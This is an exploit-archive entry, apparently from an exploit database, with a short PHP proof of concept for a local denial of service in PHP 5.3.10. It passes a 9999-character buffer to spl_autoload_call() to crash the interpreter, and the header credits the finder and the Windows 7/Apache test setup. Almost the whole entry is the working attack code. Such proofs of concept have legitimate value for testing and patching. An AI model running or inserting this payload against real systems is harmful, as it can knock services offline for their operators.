PHP 5.3.10 spl_autoload_call() Local Denial of Service
2012-06-03 10:15:08<?php
#####################################################################
## PHP 5.3.10 spl_autoload_call() Local Denial of Service
## Tested on Windows 7 64bit, English, Apache, PHP 5.3.10
## Date: 02/06/2012
## Local Denial of Service
## Bug discovered by Pr0T3cT10n, <[email protected]>
## ISRAEL
## http://www.0x31337.net
#####################################################################
$buffer = str_repeat("A",9999);
spl_autoload_call($buffer);
?>
Fixes
No fixesIn order to submit a new fix you need to be registered.